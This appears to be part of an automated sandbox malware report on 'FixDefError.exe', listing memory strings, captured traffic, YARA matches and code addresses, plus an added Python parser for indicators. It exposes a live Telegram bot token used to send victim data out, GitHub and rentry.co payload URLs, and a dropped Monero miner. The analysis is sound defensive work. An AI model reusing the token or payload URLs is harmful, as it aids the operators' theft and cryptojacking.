      Source: FixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deF
      Source: FixDefError.exe, 00000000.00000003.255774071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255760781.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255805257.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255784198.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.dea
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.dei
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deu
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org8:
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys
      Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.comD8
      Source: powershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://render.githubusercontent.com
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlig/raw
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co4
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322908815.000001CFFD83B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
      Source: svhost.exe.1.dr | String found in binary or memory: https://xmrig.com/benchmark/%s
      Source: svhost.exe.1.dr | String found in binary or memory: https://xmrig.com/docs/algorithms
      Source: svhost.exe.1.dr | String found in binary or memory: https://xmrig.com/wizard
      Source: svhost.exe.1.dr | String found in binary or memory: https://xmrig.com/wizard%s
      Source: unknown | DNS traffic detected: queries for: www.google.com
      Source: global traffic | HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1; User-Agent: Mozilla/5.0; Host: rentry.co; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1; User-Agent: Mozilla/5.0; Host: api.telegram.org; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1; User-Agent: Mozilla/5.0; Host: github.com; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1; User-Agent: Mozilla/5.0; Host: github.com; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1; User-Agent: Mozilla/5.0; Host: raw.githubusercontent.com; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1; User-Agent: Mozilla/5.0; Host: raw.githubusercontent.com; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1; Host: rentry.co; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1; Host: rentry.co
      Source: global traffic | HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1; User-Agent: Mozilla/5.0; Host: rentry.co; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: www.google.com; Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: www.google.com; Connection: Keep-Alive
      Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Window created: window name: CLIPBRDWNDCLASS
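The api.telegram.org request logged above carries the bot token in the URL path and the victim fingerprint (ID, public IP from api.ipify.org, OS, CPU, host name) percent-encoded in the `text` parameter. As an added example, not part of the Joe Sandbox report, the Python below parses that captured request target offline: it splits the bot id and secret out of the path, decodes the `text` query parameter and turns the decorated lines of the message into fields an analyst can file as indicators. The request target is copied verbatim from the row above; the field labels, the treatment of the list-marker glyphs and the handling of unlabeled lines are the example's own assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request target copied from the "HTTP traffic detected" row for api.telegram.org
# (constructed sample input so the parser runs offline).
CAPTURED_TARGET = (
    "/bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage"
    "?chat_id=-1001719155419"
    "&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202"
    "%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464"
    "%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro"
    "%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz"
    "%0A%20%20%E2%88%9F%20V33ZTS67"
)

# Bot API paths look like /bot<numeric id>:<secret>/<method>; the whole
# "<id>:<secret>" pair is the token that authenticates the bot.
BOT_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")

# Glyphs the sample uses as list decoration in front of each line
# (assumption: any of these at the start of a line is decoration, not data).
MARKERS = "\U0001F539\U0001F538\u22a2\u221f"


def parse_telegram_beacon(target: str) -> dict:
    """Parse a captured Bot API request target into token, chat and message fields."""
    parts = urlsplit(target)
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        raise ValueError("not a Telegram Bot API request target")
    query = parse_qs(parts.query, keep_blank_values=True)
    text = query.get("text", [""])[0]          # parse_qs already percent-decodes as UTF-8

    fields, unlabeled = {}, []
    for raw in text.splitlines():
        line = raw.strip().lstrip(MARKERS).strip()
        if not line or line.endswith(":"):       # section headers such as "New Worker:" / "Hardware:"
            continue
        key, sep, value = line.partition(": ")
        if sep:
            fields[key] = value                   # "ID: ...", "IP: ..."
        else:
            unlabeled.append(line)                # OS string, CPU model, host name, bare numbers

    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": query.get("chat_id", [""])[0],
        "text": text,
        "fields": fields,
        "unlabeled": unlabeled,
    }


if __name__ == "__main__":
    beacon = parse_telegram_beacon(CAPTURED_TARGET)
    for k, v in beacon.items():
        print(f"{k}: {v!r}")
```

The bot id and chat id are stable across victims and make better hunting indicators than the message text, which embeds per-host values. Because the token travels in the URL path, it is present in any proxy or TLS-inspection log that records request targets, so the same parser can be run over those logs as over this sandbox capture.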

      Spam, unwanted Advertisements and Ransom Demands

      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File written: C:\Windows\System32\drivers\etc\hosts

      System Summary

      Source: sslproxydump.pcap, type: PCAP | Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: sslproxydump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: sslproxydump.pcap, type: PCAP | Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: sslproxydump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D8989
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1649
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D7918
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1E98
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D052D
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D073A
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D27B2
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D07EB
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D0600
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D06DD
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D094F
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D0818
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D08BC
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D3308
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1250
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1240
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D32F8
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D7534
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D34B8
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D17C8
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1903
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D19B5
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1800
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1B5F
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1BAC
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D7C0E
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1C47
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_011D1CD6
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_084ED008
      Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_084ECFE6
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F7C1D8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F70BF0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F76F9C
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F710C0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F7BA20
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F77D90
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F7BD80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F7C5E8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F728D0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F728C2
